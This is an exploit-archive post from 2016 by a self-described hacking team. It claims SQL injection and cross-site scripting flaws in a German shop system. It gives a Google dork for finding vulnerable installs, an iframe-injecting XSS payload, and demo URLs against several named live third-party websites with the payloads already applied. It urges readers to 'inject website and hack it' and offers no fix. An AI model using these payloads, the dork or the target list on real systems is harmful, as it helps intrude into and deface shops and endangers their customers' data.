Shopsoftware by Unlimited-Commerce.de Multiple Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Shopsoftware by Unlimited-Commerce.de Multiple Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>* Title: Shopsoftware by Unlimited-Commerce.de Multiple Vulnerability * date: 28/4/2016 * Exploit Author : Guardiran Security Team * Website: guardiran.org * Google Dork: intext:"Shopsoftware 2009-2010 by Unlimited-Commerce.de" * Vendor Homepage: http://www.unlimited-commerce.de/ * Version : All Version * Tested On : Kali Linux / Windows 8.1 HEllo Guys. This Is a Multiple Vulnerability ( Xss & Sqli ) ------------------ SQL INJECTION : insert " or ' After PATCH URL To Give The MYSQL Error. Then You Can User The Command SQL Injection To Inject Website And Hack It. Demo : http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27 http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27 http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27 XSS: This CMS And Also Have Xss Vulnerability. We Cnd Run Our Javacode In site. Payload: '><iframe src="http://guardiran.org" width="450" height="200"></iframe> Demo: http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://www.download-by-zet.de/cms_pages.php?pn=Widerrufsbelehrung%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E * Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker * Discovered By : MR.IMAN ~~ <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="afcbcac2c0c181c7ceccc4cadd9c98efd6cec7c0c081ccc0c2">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ~~ telegram.me/MRBLACK * We Are Guardiran Security Team </BODY></HTML>
